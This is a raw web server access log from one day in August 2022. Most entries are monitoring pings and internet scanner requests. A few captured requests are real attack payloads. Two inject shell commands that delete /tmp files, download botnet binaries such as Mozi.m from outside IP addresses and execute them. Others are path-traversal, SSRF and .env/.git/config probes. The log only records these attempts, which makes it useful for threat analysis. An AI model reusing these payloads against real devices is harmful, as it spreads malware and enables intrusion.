2.57.122.98 - - [03/Aug/2022:07:01:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
190.188.188.111 - - [03/Aug/2022:07:01:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [03/Aug/2022:07:01:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.106.29.122 - - [03/Aug/2022:07:01:21 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
128.14.209.162 - - [03/Aug/2022:07:01:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [03/Aug/2022:07:02:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.116.52.176 - - [03/Aug/2022:07:02:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [03/Aug/2022:07:03:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:04:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:05:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.142.236.36 - - [03/Aug/2022:07:05:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
185.142.236.36 - - [03/Aug/2022:07:05:51 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
185.142.236.36 - - [03/Aug/2022:07:05:51 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
185.142.236.36 - - [03/Aug/2022:07:05:51 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
185.142.236.36 - - [03/Aug/2022:07:05:52 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
212.91.246.72 - - [03/Aug/2022:07:06:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:07:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:08:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:09:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
2.57.122.98 - - [03/Aug/2022:07:09:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/Aug/2022:07:10:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
130.211.54.158 - - [03/Aug/2022:07:10:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.1"
212.91.246.72 - - [03/Aug/2022:07:11:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:12:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:13:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
104.248.144.120 - - [03/Aug/2022:07:13:35 +0200] "POST /mgmt/tm/util/bash HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
104.248.144.120 - - [03/Aug/2022:07:13:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.58.0"
212.91.246.72 - - [03/Aug/2022:07:14:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:15:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:16:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:17:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:18:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.83.245.154 - - [03/Aug/2022:07:18:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [03/Aug/2022:07:19:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:20:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:21:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:22:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
37.114.201.197 - - [03/Aug/2022:07:22:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [03/Aug/2022:07:23:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:24:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:25:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.83.245.154 - - [03/Aug/2022:07:25:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [03/Aug/2022:07:26:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:27:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:28:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.106.29.122 - - [03/Aug/2022:07:28:50 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
212.91.246.72 - - [03/Aug/2022:07:29:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:30:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:31:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:32:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:33:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.225.7.111 - - [03/Aug/2022:07:33:30 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
212.91.246.72 - - [03/Aug/2022:07:34:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.89.156.207 - - [03/Aug/2022:07:34:59 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
24.189.2.92 - - [03/Aug/2022:07:35:14 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [03/Aug/2022:07:35:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.83.245.154 - - [03/Aug/2022:07:35:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [03/Aug/2022:07:36:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:37:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:38:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:39:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:40:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:41:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:42:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.83.245.154 - - [03/Aug/2022:07:43:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
193.106.29.122 - - [03/Aug/2022:07:43:05 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
212.91.246.72 - - [03/Aug/2022:07:43:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:44:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.106.29.122 - - [03/Aug/2022:07:44:21 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
212.91.246.72 - - [03/Aug/2022:07:45:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:46:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:47:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:48:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:49:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:50:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:51:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:52:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:53:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:54:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:55:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:56:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:07:57:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.142 - - [03/Aug/2022:07:58:15 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/Aug/2022:07:58:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.118.161.57 - - [03/Aug/2022:07:58:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com"
122.96.31.130 - - [03/Aug/2022:07:58:37 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://102.33.22.197:41841/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 310 "-" "-"
212.91.246.72 - - [03/Aug/2022:07:59:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:08:00:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.106.29.122 - - [03/Aug/2022:08:00:30 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
212.91.246.72 - - [03/Aug/2022:08:01:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:08:02:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:08:03:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:08:04:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:08:05:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:08:06:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:08:07:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
83.234.136.55 - - [03/Aug/2022:08:07:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [03/Aug/2022:08:08:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.106.29.122 - - [03/Aug/2022:08:08:54 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
212.91.246.72 - - [03/Aug/2022:08:09:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.62.191.231 - - [03/Aug/2022:08:10:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.64.1"
212.91.246.72 - - [03/Aug/2022:08:10:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:08:11:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:08:12:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:08:13:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
209.141.55.120 - - [03/Aug/2022:08:13:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
209.141.55.120 - - [03/Aug/2022:08:14:00 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
212.91.246.72 - - [03/Aug/2022:08:14:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:08:15:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:08:16:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
128.14.209.162 - - [03/Aug/2022:08:17:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [03/Aug/2022:08:17:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:08:18:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.237.103.123 - - [03/Aug/2022:08:19:11 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.103.123 - - [03/Aug/2022:08:19:11 +0200] "\x16\x03\x01\x01D\x01" 501 321 "-" "-"
212.91.246.72 - - [03/Aug/2022:08:19:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:08:20:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.106.29.122 - - [03/Aug/2022:08:20:48 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
212.91.246.72 - - [03/Aug/2022:08:21:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
164.52.24.165 - - [03/Aug/2022:08:21:20 +0200] "\x16\x03\x01\x01 \x01" 400 329 "-" "-"
164.52.24.165 - - [03/Aug/2022:08:21:34 +0200] "\x16\x03\x01" 501 318 "-" "-"
164.52.24.165 - - [03/Aug/2022:08:21:46 +0200] "\x16\x03\x01" 501 318 "-" "-"
164.52.24.165 - - [03/Aug/2022:08:21:55 +0200] "\x16\x03\x01" 501 318 "-" "-"
164.52.24.165 - - [03/Aug/2022:08:22:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0"
212.91.246.72 - - [03/Aug/2022:08:22:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:08:23:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.142.125.219 - - [03/Aug/2022:08:23:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.219 - - [03/Aug/2022:08:23:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.219 - - [03/Aug/2022:08:23:55 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
45.155.126.211 - - [03/Aug/2022:08:24:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; tchelebi/1.0; +http://tchelebi.io)"
212.91.246.72 - - [03/Aug/2022:08:24:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:08:25:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
201.62.80.133 - - [03/Aug/2022:08:25:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [03/Aug/2022:08:26:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:08:27:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:08:28:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:08:29:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:08:30:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
2.57.122.98 - - [03/Aug/2022:08:31:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Aug/2022:08:31:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.83.245.154 - - [03/Aug/2022:08:32:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [03/Aug/2022:08:32:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
2.57.122.98 - - [03/Aug/2022:08:32:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Aug/2022:08:33:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:08:34:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Aug/2022:08:35:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.162.235.162 - - [03/Aug/2022:08:36:09 +0200] "\x16\x03\x01" 501 318 "-" "-"
185.162.235.162 - - [03/Aug/2022:08:36:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.162.235.162 - - [03/Aug/2022:08:36:09 +0200] "HELP" 501 319 "-" "-"
185.162.235.162 - - [03/Aug/2022:08:36:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "l9tcpid/v1.1.0"
185.162.235.162 - - [03/Aug/2022:08:36:09 +0200] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts HTTP/1.1" 400 333 "-" "Lkx-Apache2449TraversalPlugin/0.0.1 (+https://leakix.net/, +https://twitter.com/HaboubiAnis)"
185.162.235.162 - - [03/Aug/2022:08:36:12 +0200] "GET /.DS_Store HTTP/1.1" 404 314 "-" "Go-http-client/1.1"
185.162.235.162 - - [03/Aug/2022:08:36:12 +0200] "GET /server-status HTTP/1.1" 403 322 "-" "l9explore/1.2.2"
185.162.235.162 - - [03/Aug/2022:08:36:13 +0200] "GET /config.json HTTP/1.1" 404 316 "-" "l9explore/1.2.2"
185.162.235.162 - - [03/Aug/2022:08:36:13 +0200] "GET /idx_config/ HTTP/1.1" 404 316 "-" "l9explore/1.2.2"
185.162.235.162 - - [03/Aug/2022:08:36:14 +0200] "GET /s/lkx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 404 380 "-" "l9explore/1.2.2"
185.162.235.162 - - [03/Aug/2022:08:36:14 +0200] "GET /api/geojson?url=file:///etc/hosts HTTP/1.1" 404 316 "-" "l9explore/1.2.2"
185.162.235.162 - - [03/Aug/2022:08:36:15 +0200] "GET /.env HTTP/1.1" 404 309 "-" "l9explore/1.2.2"
185.162.235.162 - - [03/Aug/2022:08:36:15 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "l9explore/1.2.2"
185.162.235.162 - - [03/Aug/2022:08:36:15 +0200] "GET /telescope/requests HTTP/1.1" 404 323 "-" "l9explore/1.2.2"
185.162.235.162 - - [03/Aug/2022:08:36:16 +0200] "GET /info.php HTTP/1.1" 404 313 "-" "l9explore/1.2.2"
185.162.235.162 - - [03/Aug/2022:08:36:16 +0200] "GET /.json HTTP/1.1" 404 310 "-" "l9explore/1.2.2"
185.162.235.162 - - [03/Aug/2022:08:36:17 +0200] "GET /login.action HTTP/1.1" 404 317 "-" "l9explore/1.2.2"
212.91.246.72 - - [03/Aug/2022:08:36:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.83.245.154 - - [03/Aug/2022:08:36:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
23.239.16.64 - - [03/Aug/2022:08:36:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
